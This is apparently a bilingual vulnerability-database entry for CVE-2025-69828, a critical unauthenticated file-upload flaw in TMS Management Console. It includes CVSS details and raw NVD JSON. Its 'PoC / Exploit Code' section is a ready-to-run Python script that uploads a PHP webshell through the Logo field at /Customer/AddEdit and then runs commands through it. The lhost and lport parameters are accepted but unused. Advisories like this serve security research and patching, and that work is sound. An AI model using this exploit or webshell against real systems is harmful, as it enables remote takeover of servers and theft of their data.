Security Vulnerability Report
中文
CVE-2025-69828 CVSS 10.0 CRITICAL

CVE-2025-69828

Published: 2026-01-22 17:16:28
Last Modified: 2026-04-15 00:35:42

Description

File Upload vulnerability in TMS Global Software TMS Management Console v.6.3.7.27386.20250818 allows a remote attacker to execute arbitrary code via the Logo upload in /Customer/AddEdit

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

TMS Global Software TMS Management Console v.6.3.7.27386.20250818及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69828 PoC - TMS Management Console File Upload RCE # Target: TMS Global Software TMS Management Console # Endpoint: /Customer/AddEdit def exploit(target_url, lhost, lport): """ Exploit file upload vulnerability to achieve RCE """ # Construct malicious PHP webshell webshell = '''<?php if(isset($_GET['cmd'])) { echo "<pre>"; $cmd = $_GET['cmd']; system($cmd); echo "</pre>"; } ?>''' # Prepare the file upload request files = { 'Logo': ('shell.php', webshell, 'application/x-php') } # Target endpoint url = f"{target_url}/Customer/AddEdit" try: print(f"[*] Sending exploit to {url}") response = requests.post(url, files=files, timeout=10) if response.status_code == 200: print("[+] File uploaded successfully!") # Try to access the uploaded shell shell_path = "/Customer/Logo/shell.php" shell_url = f"{target_url}{shell_path}?cmd=whoami" print(f"[*] Accessing webshell at {shell_url}") shell_response = requests.get(shell_url, timeout=10) if shell_response.status_code == 200: print(f"[+] RCE Successful! Output: {shell_response.text}") return True else: print(f"[-] Exploit failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url> [lhost] [lport]") sys.exit(1) target = sys.argv[1] lhost = sys.argv[2] if len(sys.argv) > 2 else "127.0.0.1" lport = sys.argv[3] if len(sys.argv) > 3 else "4444" exploit(target, lhost, lport)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69828", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:28.403", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Upload vulnerability in TMS Global Software TMS Management Console v.6.3.7.27386.20250818 allows a remote attacker to execute arbitrary code via the Logo upload in /Customer/AddEdit"}, {"lang": "es", "value": "Vulnerabilidad de carga de archivos en TMS Global Software TMS Management Console v.6.3.7.27386.20250818 permite a un atacante remoto ejecutar código arbitrario a través de la carga del logotipo en /Customer/AddEdit"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/ZuoqTr/CVE/blob/main/CVE-2025-69828.md", "source": "[email protected]"}, {"url": "https://tmsglobalsoft.com", "source": "[email protected]"}]}}